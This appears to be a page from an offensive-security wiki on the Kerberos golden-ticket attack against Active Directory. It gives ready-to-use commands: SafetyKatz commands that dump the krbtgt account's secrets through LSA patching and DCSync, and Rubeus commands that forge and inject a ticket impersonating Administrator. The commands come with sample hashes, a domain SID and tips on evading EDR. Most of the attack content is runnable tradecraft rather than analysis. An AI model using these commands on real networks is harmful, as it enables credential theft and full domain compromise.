golden-ticket

A golden ticket is signed and encrypted by the secrets of krbtgt account which makes it a valid TGT. The krbtgt user secrets (use AES keys for OPSEC) can be used to impersonate any user with any privileges from even a non-domain machine.

Methodology

Retrieve the AES-256 key of the krbtgt account.
Forge and inject the ticket.
Impersonate any user.

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Retrieve the AES-256 key of the krbtgt account:

SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'

Rubeus

Forge a golden ticket with similar attributes to a normal TGT:

# With an NTLM hash (Usually flagged by EDRs)
Rubeus.exe golden 
/rc4:32ED87BDB5FDC5E9CBA88547376818D4 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt

# With an AES-256 key (Admin cmd required)
Rubeus.exe golden 
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt

Previousdsrm Nextsilver-ticket

Last updated 3 months ago

hashtagMethodology

hashtagBinaries

hashtagSafetyKatz

hashtagRubeus

Methodology

Binaries

SafetyKatz

Rubeus